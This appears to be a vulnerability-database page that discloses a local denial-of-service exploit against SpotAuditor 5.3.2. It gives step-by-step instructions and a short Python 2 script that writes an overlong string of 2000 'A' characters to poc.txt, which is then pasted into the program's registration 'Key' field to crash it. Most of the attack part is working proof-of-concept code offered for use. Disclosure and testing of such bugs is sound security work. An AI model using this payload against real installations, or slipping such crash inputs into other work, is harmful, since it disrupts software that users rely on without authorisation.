SpotAuditor 5.3.2 Key Denial of Service

2019.12.10

Credit: ZwX

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-28
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a

'''
Proof of Concept (PoC):
=======================

1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotAuditor Crashed
'''
#!/usr/bin/python

http = "http//"
buffer = "\x41" * 2000


poc = http + buffer 
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SpotAuditor 5.3.2 Key Denial of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.